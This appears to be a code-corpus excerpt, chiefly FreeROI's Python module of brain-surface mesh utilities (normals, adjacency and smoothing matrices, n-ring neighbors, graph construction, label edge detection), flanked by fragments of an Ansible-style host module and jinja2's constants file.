module, 'host_define', xcli_client)
elif state == 'absent' and host:
state_changed = execute_pyxcli_command(
module, 'host_delete', xcli_client)
module.exit_json(changed=state_changed)
if __name__ == '__main__':
main()
| gpl-3.0 |
sunshineDrizzle/FreeROI | froi/algorithm/meshtool.py | 2 | 36643 | # emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
import os
import subprocess
import logging
import numpy as np
import matplotlib as mpl
from matplotlib import cm
from networkx import Graph
from scipy import sparse
from scipy.spatial.distance import cdist, pdist
from scipy.stats import pearsonr
logger = logging.getLogger(__name__)
# Note: coord_to_label below also relies on a PySurfer-style Surface class
# that is not imported in this module.
def _fast_cross_3d(x, y):
"""Compute cross product between list of 3D vectors
Much faster than np.cross() when the number of cross products
    becomes large (>500). This is because np.cross() becomes
    less memory efficient at that scale.
Parameters
----------
x : array
Input array 1.
y : array
Input array 2.
Returns
-------
z : array
Cross product of x and y.
Notes
-----
x and y must both be 2D row vectors. One must have length 1, or both
lengths must match.
"""
assert x.ndim == 2
assert y.ndim == 2
assert x.shape[1] == 3
assert y.shape[1] == 3
assert (x.shape[0] == 1 or y.shape[0] == 1) or x.shape[0] == y.shape[0]
if max([x.shape[0], y.shape[0]]) >= 500:
return np.c_[x[:, 1] * y[:, 2] - x[:, 2] * y[:, 1],
x[:, 2] * y[:, 0] - x[:, 0] * y[:, 2],
x[:, 0] * y[:, 1] - x[:, 1] * y[:, 0]]
else:
return np.cross(x, y)
def compute_normals(rr, tris):
"""Efficiently compute vertex normals for triangulated surface"""
# first, compute triangle normals
r1 = rr[tris[:, 0], :]
r2 = rr[tris[:, 1], :]
r3 = rr[tris[:, 2], :]
tri_nn = _fast_cross_3d((r2 - r1), (r3 - r1))
# Triangle normals and areas
size = np.sqrt(np.sum(tri_nn * tri_nn, axis=1))
zidx = np.where(size == 0)[0]
# prevent ugly divide-by-zero
size[zidx] = 1.0
tri_nn /= size[:, np.newaxis]
npts = len(rr)
# the following code replaces this, but is faster (vectorized):
#
# for p, verts in enumerate(tris):
# nn[verts, :] += tri_nn[p, :]
#
nn = np.zeros((npts, 3))
# note this only loops 3x (number of verts per tri)
for verts in tris.T:
for idx in range(3): # x, y, z
nn[:, idx] += np.bincount(verts, tri_nn[:, idx], minlength=npts)
size = np.sqrt(np.sum(nn * nn, axis=1))
# prevent ugly divide-by-zero
size[size == 0] = 1.0
nn /= size[:, np.newaxis]
return nn
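# Minimal usage sketch: unit normals for a flat two-triangle mesh in the z=0 plane.
#   rr = np.array([[0., 0., 0.], [1., 0., 0.], [1., 1., 0.], [0., 1., 0.]])
#   faces = np.array([[0, 1, 3], [1, 2, 3]])
#   compute_normals(rr, faces)  # every row is (0., 0., 1.)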
def find_closest_vertices(surface_coords, point_coords):
"""Return the vertices on a surface mesh closest to some
given coordinates.
The distance metric used is Euclidian distance.
Parameters
----------
surface_coords : numpy array
Array of coordinates on a surface mesh
point_coords : numpy array
Array of coordinates to map to vertices
Returns
-------
closest_vertices : numpy array
Array of mesh vertex ids
"""
point_coords = np.atleast_2d(point_coords)
return np.argmin(cdist(surface_coords, point_coords), axis=0)
def tal_to_mni(coords):
"""Convert Talairach coords to MNI using the Lancaster transform.
Parameters
----------
coords : n x 3 numpy array
Array of Talairach coordinates
Returns
-------
mni_coords : n x 3 numpy array
Array of coordinates converted to MNI space
"""
coords = np.atleast_2d(coords)
xfm = np.array([[1.06860, -0.00396, 0.00826, 1.07816],
[0.00640, 1.05741, 0.08566, 1.16824],
[-0.01281, -0.08863, 1.10792, -4.17805],
[0.00000, 0.00000, 0.00000, 1.00000]])
mni_coords = np.dot(np.c_[coords, np.ones(coords.shape[0])], xfm.T)[:, :3]
return mni_coords
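# Illustrative usage (the coordinate values are arbitrary):
#   tal_to_mni([-44, -58, -15]) returns a 1 x 3 array with the corresponding
#   MNI coordinates; an n x 3 input returns an n x 3 array.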
def mesh_edges(faces):
"""
Returns sparse matrix with edges as an adjacency matrix
Parameters
----------
faces : array of shape [n_triangles x 3]
The mesh faces
Returns
-------
edges : sparse matrix
The adjacency matrix
"""
npoints = np.max(faces) + 1
nfaces = len(faces)
a, b, c = faces.T
edges = sparse.coo_matrix((np.ones(nfaces), (a, b)),
shape=(npoints, npoints))
edges = edges + sparse.coo_matrix((np.ones(nfaces), (b, c)),
shape=(npoints, npoints))
edges = edges + sparse.coo_matrix((np.ones(nfaces), (c, a)),
shape=(npoints, npoints))
edges = edges + edges.T
edges = edges.tocoo()
return edges
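# Minimal sketch: adjacency for two triangles sharing the edge (1, 3).
#   faces = np.array([[0, 1, 3], [1, 2, 3]])
#   edges = mesh_edges(faces)  # 4 x 4 sparse matrix in COO format
# The shared edge accumulates a value of 2; every other edge gets 1.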
def create_color_lut(cmap, n_colors=256):
"""Return a colormap suitable for setting as a Mayavi LUT.
Parameters
----------
cmap : string, list of colors, n x 3 or n x 4 array
Input colormap definition. This can be the name of a matplotlib
colormap, a list of valid matplotlib colors, or a suitable
mayavi LUT (possibly missing the alpha channel).
n_colors : int, optional
Number of colors in the resulting LUT. This is ignored if cmap
is a 2d array.
Returns
-------
lut : n_colors x 4 integer array
Color LUT suitable for passing to mayavi
"""
if isinstance(cmap, np.ndarray):
if np.ndim(cmap) == 2:
if cmap.shape[1] == 4:
# This looks likes a LUT that's ready to go
lut = cmap.astype(np.int)
elif cmap.shape[1] == 3:
# This looks like a LUT, but it's missing the alpha channel
alpha = np.ones(len(cmap), np.int) * 255
lut = np.c_[cmap, alpha]
return lut
# Otherwise, we're going to try and use matplotlib to create it
if cmap in dir(cm):
# This is probably a matplotlib colormap, so build from that
# The matplotlib colormaps are a superset of the mayavi colormaps
# except for one or two cases (i.e. blue-red, which is a crappy
# rainbow colormap and shouldn't be used for anything, although in
# its defense it's better than "Jet")
cmap = getattr(cm, cmap)
elif np.iterable(cmap):
# This looks like a list of colors? Let's try that.
colors = list(map(mpl.colors.colorConverter.to_rgb, cmap))
cmap = mpl.colors.LinearSegmentedColormap.from_list("_", colors)
else:
# If we get here, it's a bad input
raise ValueError("Input %s was not valid for making a lut" % cmap)
# Convert from a matplotlib colormap to a lut array
lut = (cmap(np.linspace(0, 1, n_colors)) * 255).astype(np.int)
return lut
def smoothing_matrix(vertices, adj_mat, smoothing_steps=20, verbose=None):
"""Create a smoothing matrix which can be used to interpolate data defined
    for a subset of vertices onto a mesh with an adjacency matrix given by
adj_mat.
If smoothing_steps is None, as many smoothing steps are applied until
the whole mesh is filled with with non-zeros. Only use this option if
the vertices correspond to a subsampled version of the mesh.
Parameters
----------
vertices : 1d array
vertex indices
adj_mat : sparse matrix
N x N adjacency matrix of the full mesh
smoothing_steps : int or None
number of smoothing steps (Default: 20)
verbose : bool, str, int, or None
If not None, override default verbose level (see surfer.verbose).
Returns
-------
smooth_mat : sparse matrix
smoothing matrix with size N x len(vertices)
"""
from scipy import sparse
logger.info("Updating smoothing matrix, be patient..")
e = adj_mat.copy()
e.data[e.data == 2] = 1
n_vertices = e.shape[0]
e = e + sparse.eye(n_vertices, n_vertices)
idx_use = vertices
smooth_mat = 1.0
n_iter = smoothing_steps if smoothing_steps is not None else 1000
for k in range(n_iter):
e_use = e[:, idx_use]
data1 = e_use * np.ones(len(idx_use))
idx_use = np.where(data1)[0]
scale_mat = sparse.dia_matrix((1 / data1[idx_use], 0),
shape=(len(idx_use), len(idx_use)))
smooth_mat = scale_mat * e_use[idx_use, :] * smooth_mat
logger.info("Smoothing matrix creation, step %d" % (k + 1))
if smoothing_steps is None and len(idx_use) >= n_vertices:
break
# Make sure the smoothing matrix has the right number of rows
# and is in COO format
smooth_mat = smooth_mat.tocoo()
smooth_mat = sparse.coo_matrix((smooth_mat.data,
(idx_use[smooth_mat.row],
smooth_mat.col)),
shape=(n_vertices,
len(vertices)))
return smooth_mat
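# Minimal usage sketch: spread a value defined on vertex 0 over the toy mesh above.
#   adj = mesh_edges(np.array([[0, 1, 3], [1, 2, 3]]))
#   m = smoothing_matrix(np.array([0]), adj, smoothing_steps=2)  # shape (4, 1)
#   m * np.array([1.])  # smoothed values for all four vertices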
def coord_to_label(subject_id, coord, label, hemi='lh', n_steps=30,
map_surface='white', coord_as_vert=False, verbose=None):
"""Create label from MNI coordinate
Parameters
----------
subject_id : string
Use if file is in register with subject's orig.mgz
coord : numpy array of size 3 | int
One coordinate in MNI space or the vertex index.
label : str
Label name
hemi : [lh, rh]
Hemisphere target
n_steps : int
Number of dilation iterations
map_surface : str
The surface name used to find the closest point
coord_as_vert : bool
whether the coords parameter should be interpreted as vertex ids
verbose : bool, str, int, or None
If not None, override default verbose level (see surfer.verbose).
"""
geo = Surface(subject_id, hemi, map_surface)
geo.load_geometry()
if coord_as_vert:
coord = geo.coords[coord]
n_vertices = len(geo.coords)
adj_mat = mesh_edges(geo.faces)
foci_vtxs = find_closest_vertices(geo.coords, [coord])
data = np.zeros(n_vertices)
data[foci_vtxs] = 1.
smooth_mat = smoothing_matrix(np.arange(n_vertices), adj_mat, 1)
for _ in range(n_steps):
data = smooth_mat * data
idx = np.where(data.ravel() > 0)[0]
# Write label
label_fname = label + '-' + hemi + '.label'
logger.info("Saving label : %s" % label_fname)
f = open(label_fname, 'w')
f.write('#label at %s from subject %s\n' % (coord, subject_id))
f.write('%d\n' % len(idx))
for i in idx:
x, y, z = geo.coords[i]
f.write('%d %f %f %f 0.000000\n' % (i, x, y, z))
def _get_subjects_dir(subjects_dir=None, raise_error=True):
"""Get the subjects directory from parameter or environment variable
Parameters
----------
subjects_dir : str | None
The subjects directory.
raise_error : bool
If True, raise a ValueError if no value for SUBJECTS_DIR can be found
or the corresponding directory does not exist.
Returns
-------
subjects_dir : str
The subjects directory. If the subjects_dir input parameter is not
None, its value will be returned, otherwise it will be obtained from
the SUBJECTS_DIR environment variable.
"""
if subjects_dir is None:
subjects_dir = os.environ.get("SUBJECTS_DIR", "")
if not subjects_dir and raise_error:
raise ValueError('The subjects directory has to be specified '
'using the subjects_dir parameter or the '
'SUBJECTS_DIR environment variable.')
if raise_error and not os.path.exists(subjects_dir):
raise ValueError('The subjects directory %s does not exist.'
% subjects_dir)
return subjects_dir
def has_fsaverage(subjects_dir=None):
"""Determine whether the user has a usable fsaverage"""
fs_dir = os.path.join(_get_subjects_dir(subjects_dir, False), 'fsaverage')
if not os.path.isdir(fs_dir):
return False
if not os.path.isdir(os.path.join(fs_dir, 'surf')):
return False
return True
requires_fsaverage = np.testing.dec.skipif(not has_fsaverage(),
'Requires fsaverage subject data')
# --- check ffmpeg
def has_ffmpeg():
"""Test whether the FFmpeg is available in a subprocess
Returns
-------
ffmpeg_exists : bool
True if FFmpeg can be successfully called, False otherwise.
"""
try:
subprocess.call(["ffmpeg"], stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
return True
except OSError:
return False
def assert_ffmpeg_is_available():
"Raise a RuntimeError if FFmpeg is not in the PATH"
if not has_ffmpeg():
err = ("FFmpeg is not in the path and is needed for saving "
"movies. Install FFmpeg and try again. It can be "
"downlaoded from http://ffmpeg.org/download.html.")
raise RuntimeError(err)
requires_ffmpeg = np.testing.dec.skipif(not has_ffmpeg(), 'Requires FFmpeg')
def ffmpeg(dst, frame_path, framerate=24, codec='mpeg4', bitrate='1M'):
"""Run FFmpeg in a subprocess to convert an image sequence into a movie
Parameters
----------
dst : str
Destination path. If the extension is not ".mov" or ".avi", ".mov" is
added. If the file already exists it is overwritten.
frame_path : str
Path to the source frames (with a frame number field like '%04d').
framerate : float
Framerate of the movie (frames per second, default 24).
codec : str | None
Codec to use (default 'mpeg4'). If None, the codec argument is not
forwarded to ffmpeg, which preserves compatibility with very old
versions of ffmpeg
bitrate : str | float
Bitrate to use to encode movie. Can be specified as number (e.g.
64000) or string (e.g. '64k'). Default value is 1M
Notes
-----
    Requires FFmpeg to be in the path. FFmpeg can be downloaded from `here
<http://ffmpeg.org/download.html>`_. Stdout and stderr are written to the
logger. If the movie file is not created, a RuntimeError is raised.
"""
assert_ffmpeg_is_available()
# find target path
dst = os.path.expanduser(dst)
dst = os.path.abspath(dst)
root, ext = os.path.splitext(dst)
dirname = os.path.dirname(dst)
if ext not in ['.mov', '.avi']:
dst += '.mov'
if os.path.exists(dst):
os.remove(dst)
elif not os.path.exists(dirname):
os.mkdir(dirname)
frame_dir, frame_fmt = os.path.split(frame_path)
# make the movie
cmd = ['ffmpeg', '-i', frame_fmt, '-r', str(framerate),
'-b:v', str(bitrate)]
if codec is not None:
cmd += ['-c', codec]
cmd += [dst]
logger.info("Running FFmpeg with command: %s", ' '.join(cmd))
sp = subprocess.Popen(cmd, cwd=frame_dir, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
# log stdout and stderr
stdout, stderr = sp.communicate()
std_info = os.linesep.join(("FFmpeg stdout", '=' * 25, stdout))
logger.info(std_info)
if stderr.strip():
err_info = os.linesep.join(("FFmpeg stderr", '=' * 27, stderr))
# FFmpeg prints to stderr in the absence of an error
logger.info(err_info)
# check that movie file is created
if not os.path.exists(dst):
err = ("FFmpeg failed, no file created; see log for more more "
"information.")
raise RuntimeError(err)
def get_n_ring_neighbor(faces, n=1, ordinal=False, mask=None):
"""
get n ring neighbor from faces array
Parameters
----------
faces : numpy array
the array of shape [n_triangles, 3]
n : integer
specify which ring should be got
ordinal : bool
True: get the n_th ring neighbor
False: get the n ring neighbor
mask : 1-D numpy array
        specify an area where the ROI is
non-ROI element's value is zero
Returns
-------
lists
each index of the list represents a vertex number
each element is a set which includes neighbors of corresponding vertex
"""
n_vtx = np.max(faces) + 1 # get the number of vertices
if mask is not None and np.nonzero(mask)[0].shape[0] == n_vtx:
        # In this case, the mask covers all vertices and is equivalent to having no mask (None).
        # So the program resets it to None, which saves computational cost.
mask = None
# find 1_ring neighbors' id for each vertex
coo_w = mesh_edges(faces)
csr_w = coo_w.tocsr()
if mask is None:
vtx_iter = range(n_vtx)
n_ring_neighbors = [csr_w.indices[csr_w.indptr[i]:csr_w.indptr[i+1]] for i in vtx_iter]
n_ring_neighbors = [set(i) for i in n_ring_neighbors]
else:
mask_id = np.nonzero(mask)[0]
vtx_iter = mask_id
n_ring_neighbors = [set(csr_w.indices[csr_w.indptr[i]:csr_w.indptr[i+1]])
if mask[i] != 0 else set() for i in range(n_vtx)]
for vtx in vtx_iter:
neighbor_set = n_ring_neighbors[vtx]
neighbor_iter = list(neighbor_set)
for i in neighbor_iter:
if mask[i] == 0:
neighbor_set.discard(i)
if n > 1:
# find n_ring neighbors
one_ring_neighbors = [i.copy() for i in n_ring_neighbors]
n_th_ring_neighbors = [i.copy() for i in n_ring_neighbors]
# if n>1, go to get more neighbors
for i in range(n-1):
for neighbor_set in n_th_ring_neighbors:
neighbor_set_tmp = neighbor_set.copy()
for v_id in neighbor_set_tmp:
neighbor_set.update(one_ring_neighbors[v_id])
if i == 0:
for v_id in vtx_iter:
n_th_ring_neighbors[v_id].remove(v_id)
for v_id in vtx_iter:
n_th_ring_neighbors[v_id] -= n_ring_neighbors[v_id] # get the (i+2)_th ring neighbors
n_ring_neighbors[v_id] |= n_th_ring_neighbors[v_id] # get the (i+2) ring neighbors
elif n == 1:
n_th_ring_neighbors = n_ring_neighbors
else:
raise RuntimeError("The number of rings should be equal or greater than 1!")
if ordinal:
return n_th_ring_neighbors
else:
return n_ring_neighbors
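# Minimal sketch: 1-ring neighbors on the toy two-triangle mesh.
#   faces = np.array([[0, 1, 3], [1, 2, 3]])
#   get_n_ring_neighbor(faces)  # [{1, 3}, {0, 2, 3}, {1, 3}, {0, 1, 2}]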
def get_vtx_neighbor(vtx, faces, n=1, ordinal=False, mask=None):
"""
Get one vertex's n-ring neighbor vertices
Parameters
----------
vtx : integer
a vertex's id
faces : numpy array
the array of shape [n_triangles, 3]
n : integer
specify which ring should be got
ordinal : bool
True: get the n_th ring neighbor
False: get the n ring neighbor
mask : 1-D numpy array
        specify an area where the ROI is.
Return
------
neighbors : set
contain neighbors of the vtx
"""
n_ring_neighbors = _get_vtx_neighbor(vtx, faces, mask)
n_th_ring_neighbors = n_ring_neighbors.copy()
for i in range(n-1):
neighbors_tmp = set()
for neighbor in n_th_ring_neighbors:
neighbors_tmp.update(_get_vtx_neighbor(neighbor, faces, mask))
if i == 0:
neighbors_tmp.discard(vtx)
n_th_ring_neighbors = neighbors_tmp.difference(n_ring_neighbors)
n_ring_neighbors.update(n_th_ring_neighbors)
if ordinal:
return n_th_ring_neighbors
else:
return n_ring_neighbors
def _get_vtx_neighbor(vtx, faces, mask=None):
"""
Get one vertex's 1-ring neighbor vertices
Parameters
----------
vtx : integer
a vertex's id
faces : numpy array
the array of shape [n_triangles, 3]
mask : 1-D numpy array
        specify an area where the ROI is.
Return
------
neighbors : set
contain neighbors of the vtx
"""
row_indices, _ = np.where(faces == vtx)
neighbors = set(np.unique(faces[row_indices]))
neighbors.discard(vtx)
if mask is not None:
neighbor_iter = list(neighbors)
for i in neighbor_iter:
if mask[i] == 0:
neighbors.discard(i)
return neighbors
def mesh2edge_list(faces, n=1, ordinal=False, mask=None, vtx_signal=None,
weight_type=('dissimilar', 'euclidean'), weight_normalization=False):
"""
get edge_list according to mesh's geometry and vtx_signal
The edge_list can be used to create graph or adjacent matrix
Parameters
----------
faces : a array with shape (n_triangles, 3)
n : integer
specify which ring should be got
ordinal : bool
True: get the n_th ring neighbor
False: get the n ring neighbor
mask : 1-D numpy array
        specify an area where the ROI is
non-ROI element's value is zero
vtx_signal : numpy array
NxM array, N is the number of vertices,
M is the number of measurements and time points.
weight_type : (str1, str2)
The rule used for calculating weights
such as ('dissimilar', 'euclidean') and ('similar', 'pearson correlation')
weight_normalization : bool
If it is False, do nothing.
If it is True, normalize weights to [0, 1].
        After doing this, the greater the weight is, the more related the edge's two vertices are.
Returns
-------
row_ind : list
row indices of edges
col_ind : list
column indices of edges
edge_data : list
        edge data of the edges given by zip(row_ind, col_ind)
"""
n_ring_neighbors = get_n_ring_neighbor(faces, n, ordinal, mask)
row_ind = [i for i, neighbors in enumerate(n_ring_neighbors) for v_id in neighbors]
col_ind = [v_id for neighbors in n_ring_neighbors for v_id in neighbors]
if vtx_signal is None:
# create unweighted edges
n_edge = len(row_ind) # the number of edges
edge_data = np.ones(n_edge)
else:
# calculate weights according to mesh's geometry and vertices' signal
if weight_type[0] == 'dissimilar':
if weight_type[1] == 'euclidean':
edge_data = [pdist(vtx_signal[[i, j]], metric=weight_type[1])[0]
for i, j in zip(row_ind, col_ind)]
elif weight_type[1] == 'relative_euclidean':
edge_data = []
for i, j in zip(row_ind, col_ind):
euclidean = pdist(vtx_signal[[i, j]], metric='euclidean')[0]
sum_ij = np.sum(abs(vtx_signal[[i, j]]))
if sum_ij:
edge_data.append(float(euclidean) / sum_ij)
else:
edge_data.append(0)
else:
raise RuntimeError("The weight_type-{} is not supported now!".format(weight_type))
if weight_normalization:
max_dissimilar = np.max(edge_data)
min_dissimilar = np.min(edge_data)
edge_data = [(max_dissimilar-dist)/(max_dissimilar-min_dissimilar) for dist in edge_data]
elif weight_type[0] == 'similar':
if weight_type[1] == 'pearson correlation':
edge_data = [pearsonr(vtx_signal[i], vtx_signal[j])[0] for i, j in zip(row_ind, col_ind)]
elif weight_type[1] == 'mean':
edge_data = [np.mean(vtx_signal[[i, j]]) for i, j in zip(row_ind, col_ind)]
else:
raise RuntimeError("The weight_type-{} is not supported now!".format(weight_type))
if weight_normalization:
max_similar = np.max(edge_data)
min_similar = np.min(edge_data)
edge_data = [(simi-min_similar)/(max_similar-min_similar) for simi in edge_data]
else:
raise TypeError("The weight_type-{} is not supported now!".format(weight_type))
return row_ind, col_ind, edge_data
def mesh2adjacent_matrix(faces, n=1, ordinal=False, mask=None, vtx_signal=None,
weight_type=('dissimilar', 'euclidean'), weight_normalization=False):
"""
get adjacent matrix according to mesh's geometry and vtx_signal
Parameters
----------
faces : a array with shape (n_triangles, 3)
n : integer
specify which ring should be got
ordinal : bool
True: get the n_th ring neighbor
False: get the n ring neighbor
mask : 1-D numpy array
        specify an area where the ROI is
non-ROI element's value is zero
vtx_signal : numpy array
NxM array, N is the number of vertices,
M is the number of measurements and time points.
weight_type : (str1, str2)
The rule used for calculating weights
such as ('dissimilar', 'euclidean') and ('similar', 'pearson correlation')
weight_normalization : bool
If it is False, do nothing.
If it is True, normalize weights to [0, 1].
        After doing this, the greater the weight is, the more related the edge's two vertices are.
Returns
-------
adjacent_matrix : coo matrix
"""
n_vtx = np.max(faces) + 1
row_ind, col_ind, edge_data = mesh2edge_list(faces, n, ordinal, mask, vtx_signal,
weight_type, weight_normalization)
adjacent_matrix = sparse.coo_matrix((edge_data, (row_ind, col_ind)), (n_vtx, n_vtx))
return adjacent_matrix
def mesh2graph(faces, n=1, ordinal=False, mask=None, vtx_signal=None,
weight_type=('dissimilar', 'euclidean'), weight_normalization=True):
"""
create graph according to mesh's geometry and vtx_signal
Parameters
----------
faces : a array with shape (n_triangles, 3)
n : integer
specify which ring should be got
ordinal : bool
True: get the n_th ring neighbor
False: get the n ring neighbor
mask : 1-D numpy array
        specify an area where the ROI is
non-ROI element's value is zero
vtx_signal : numpy array
NxM array, N is the number of vertices,
M is the number of measurements and time points.
weight_type : (str1, str2)
The rule used for calculating weights
such as ('dissimilar', 'euclidean') and ('similar', 'pearson correlation')
weight_normalization : bool
If it is False, do nothing.
If it is True, normalize weights to [0, 1].
        After doing this, the greater the weight is, the more related the edge's two vertices are.
Returns
-------
graph : nx.Graph
"""
row_ind, col_ind, edge_data = mesh2edge_list(faces, n, ordinal, mask, vtx_signal,
weight_type, weight_normalization)
graph = Graph()
    # add_weighted_edges_from only adds edges. If the graph were created by that method alone,
    # every node would need at least one edge. However, some graphs contain nodes
    # with no edges at all, so we add the nodes explicitly first.
if mask is None:
n_vtx = np.max(faces) + 1
graph.add_nodes_from(range(n_vtx))
else:
vertices = np.nonzero(mask)[0]
graph.add_nodes_from(vertices)
# add_weighted_edges_from is faster than from_scipy_sparse_matrix and from_numpy_matrix
# add_weighted_edges_from is also faster than default constructor
# To get more related information, please refer to
# http://stackoverflow.com/questions/24681677/transform-csr-matrix-into-networkx-graph
graph.add_weighted_edges_from(zip(row_ind, col_ind, edge_data))
return graph
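# Minimal usage sketch (the signal values are arbitrary):
#   vtx_signal = np.array([[1.], [2.], [3.], [4.]])
#   g = mesh2graph(np.array([[0, 1, 3], [1, 2, 3]]), vtx_signal=vtx_signal)
# g has 4 nodes; the edge weights are euclidean dissimilarities rescaled to
# [0, 1], so a larger weight means the two vertices are more similar.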
def binary_shrink(bin_data, faces, n=1, n_ring_neighbors=None):
"""
shrink bin_data
Parameters
----------
bin_data : 1-D numpy array
Each array index is corresponding to vertex id in the faces.
Each element is a bool.
faces : numpy array
the array of shape [n_triangles, 3]
n : integer
specify which ring should be got
n_ring_neighbors : list
If this parameter is not None, two parameters ('faces', 'n') will be ignored.
It is used to save time when someone repeatedly uses the function with
a same n_ring_neighbors which can be got by get_n_ring_neighbor.
The indices are vertices' id of a mesh.
One index's corresponding element is a collection of vertices which connect with the index.
Return
------
new_data : 1-D numpy array with bool elements
The output of the bin_data after binary shrink
"""
if bin_data.dtype != np.bool:
raise TypeError("The input dtype must be bool")
vertices = np.where(bin_data)[0]
new_data = np.zeros_like(bin_data)
if n_ring_neighbors is None:
n_ring_neighbors = get_n_ring_neighbor(faces, n)
for v_id in vertices:
neighbors_values = [bin_data[_] for _ in n_ring_neighbors[v_id]]
if np.all(neighbors_values):
new_data[v_id] = True
return new_data
def binary_expand(bin_data, faces, n=1, n_ring_neighbors=None):
"""
expand bin_data
Parameters
----------
bin_data : 1-D numpy array
Each array index is corresponding to vertex id in the faces.
Each element is a bool.
faces : numpy array
the array of shape [n_triangles, 3]
n : integer
specify which ring should be got
n_ring_neighbors : list
If this parameter is not None, two parameters ('faces' and 'n') will be ignored.
It is used to save time when someone repeatedly uses the function with
a same n_ring_neighbors which can be got by get_n_ring_neighbor.
The indices are vertices' id of a mesh.
One index's corresponding element is a collection of vertices which connect with the index.
Return
------
new_data : 1-D numpy array with bool elements
The output of the bin_data after binary expand
"""
if bin_data.dtype != np.bool:
raise TypeError("The input dtype must be bool")
vertices = np.where(bin_data)[0]
new_data = bin_data.copy()
if n_ring_neighbors is None:
n_ring_neighbors = get_n_ring_neighbor(faces, n)
for v_id in vertices:
neighbors_values = [bin_data[_] for _ in n_ring_neighbors[v_id]]
if not np.all(neighbors_values):
new_data[list(n_ring_neighbors[v_id])] = True
return new_data
def label_edge_detection(data, faces, edge_type="inner", neighbors=None):
"""
edge detection for labels
Parameters
----------
data : 1-D numpy array
Each array index is corresponding to vertex id in the faces.
Each element is a label id.
faces : numpy array
the array of shape [n_triangles, 3]
edge_type : str
"inner" means inner edges of labels.
"outer" means outer edges of labels.
"both" means both of them in one array
"split" means returning inner and outer edges in two arrays respectively
neighbors : list
        If this parameter is not None, the parameter ('faces') will be ignored.
It is used to save time when someone repeatedly uses the function with
a same neighbors which can be got by get_n_ring_neighbor.
The indices are vertices' id of a mesh.
One index's corresponding element is a collection of vertices which connect with the index.
Return
------
inner_data : 1-D numpy array
the inner edges of the labels
outer_data : 1-D numpy array
the outer edges of the labels
        It's worth noting that outer_data's element values may
        not strictly correspond to the labels' ids when
        some labels are too close to each other.
"""
# data preparation
vertices = np.nonzero(data)[0]
inner_data = np.zeros_like(data)
outer_data = np.zeros_like(data)
if neighbors is None:
neighbors = get_n_ring_neighbor(faces)
# look for edges
for v_id in vertices:
neighbors_values = [data[_] for _ in neighbors[v_id]]
if min(neighbors_values) != max(neighbors_values):
if edge_type in ("inner", "both", "split"):
inner_data[v_id] = data[v_id]
if edge_type in ("outer", "both", "split"):
outer_vtx = [vtx for vtx in neighbors[v_id] if data[v_id] != data[vtx]]
outer_data[outer_vtx] = data[v_id]
# return results
if edge_type == "inner":
return inner_data
elif edge_type == "outer":
return outer_data
elif edge_type == "both":
return inner_data + outer_data
elif edge_type == "split":
return inner_data, outer_data
else:
raise ValueError("The argument 'edge_type' must be one of the (inner, outer, both, split)")
def get_patch_by_crg(vertices, neighbors_list):
"""
    Find patches in the 'vertices'. As a result, a vertex can connect with other vertices
    in the same patch, but can't connect with vertices in other patches.
The function is similar as connected component detection in graph theory.
:param vertices: set
:param neighbors_list: list
The indices are vertices' id of a mesh.
One index's corresponding element is a collection of vertices which connect with the index.
:return: patches
Each element of it is a collection of vertices, that is a patch.
"""
from froi.algorithm.regiongrow import RegionGrow
patches = []
while vertices:
seed = vertices.pop()
patch = RegionGrow().connectivity_grow([[seed]], neighbors_list)[0]
patches.append(list(patch))
vertices.difference_update(patch)
return patches
class LabelAssessment(object):
@staticmethod
def transition_level(label, data, faces, neighbors=None, relative=False):
"""
Calculate the transition level on the region's boundary.
The result is regarded as the region's assessed value.
Adapted from (Chantal et al. 2002).
Parameters
----------
label : list
a collection of vertices with the label
data : numpy array
scalar data with the shape (#vertices, #features)
faces : numpy array
the array of shape [n_triangles, 3]
neighbors : list
If this parameter is not None, the parameter ('faces') will be ignored.
It is used to save time when someone repeatedly uses the function with
a same neighbors which can be got by get_n_ring_neighbor.
The indices are vertices' id of a mesh.
One index's corresponding element is a collection of vertices which connect with the index.
relative: bool
If True, divide the transition level by the sum of the couple's absolute value.
Return
------
assessed_value : float
Larger is often better.
"""
label_data = np.zeros_like(data, dtype=np.int8)
label_data[label] = 1
inner_data = label_edge_detection(label_data, faces, "inner", neighbors)
inner_edge = np.nonzero(inner_data)[0]
count = 0
sum_tmp = 0
for vtx_i in inner_edge:
for vtx_o in neighbors[vtx_i]:
if label_data[vtx_o] == 0:
couple_signal = data[[vtx_i, vtx_o]]
euclidean = float(pdist(couple_signal)[0])
if relative:
denominator = np.sum(abs(couple_signal))
euclidean = euclidean / denominator if denominator else 0
sum_tmp += euclidean
count += 1
return sum_tmp / float(count) if count else 0
if __name__ == '__main__':
from nibabel.freesurfer import read_geometry
from froi.io.surf_io import read_scalar_data
from networkx import Graph
from graph_tool import graph2parcel, node_attr2array
import nibabel as nib
coords, faces = read_geometry('/nfs/t1/nsppara/corticalsurface/fsaverage5/surf/rh.inflated')
scalar = read_scalar_data('/nfs/t3/workingshop/chenxiayu/data/region-growing-froi/S1/surf/'
'rh_zstat1_1w_fracavg.mgz')
# faces = np.array([[1, 2, 3], [0, 1, 3]])
# scalar = np.array([[1], [2], [3], [4]])
graph = mesh2graph(faces, vtx_signal=scalar, weight_normalization=True)
graph, parcel_neighbors = graph2parcel(graph, n=5000)
labels = [attrs['label'] for attrs in graph.node.values()]
print 'finish ncut!'
labels = np.unique(labels)
print len(labels)
print np.max(labels)
arr = node_attr2array(graph, ('label',))
# zero_idx = np.where(map(lambda x: x not in parcel_neighbors[800], arr))
# arr[zero_idx[0]] = 0
nib.save(nib.Nifti1Image(arr, np.eye(4)), '/nfs/t3/workingshop/chenxiayu/test/cxy/ncut_label_1w_5000.nii')
| bsd-3-clause |
djphan/c410-Repo | c410-Lab4_5_Flask/env-lab4/lib/python2.7/site-packages/jinja2/constants.py | 1169 | 1626 | # -*- coding: utf-8 -*-
"""
jinja.constants
~~~~~~~~~~~~~~~
Various constants.
:copyright: (c) 2010 by the Jinja Team.
:license: BSD, see LICENSE for more details.
"""
#: list of lorem ipsum words used by the lipsum() helper function
LOREM_IPSUM_WORDS = u'''\
a ac accumsan ad adipiscing aenean aliquam aliquet amet ante aptent arcu at
auctor augue bibendum blandit class commodo condimentum congue consectetuer
consequat conubia convallis cras cubilia cum curabitur curae cursus dapibus
diam dictum dictumst dignissim dis dolor donec dui duis egestas eget eleifend
elementum elit enim erat eros est et etiam eu euismod facilisi facilisis fames
faucibus felis fermentum feugiat fringilla fusce gravida habitant habitasse hac
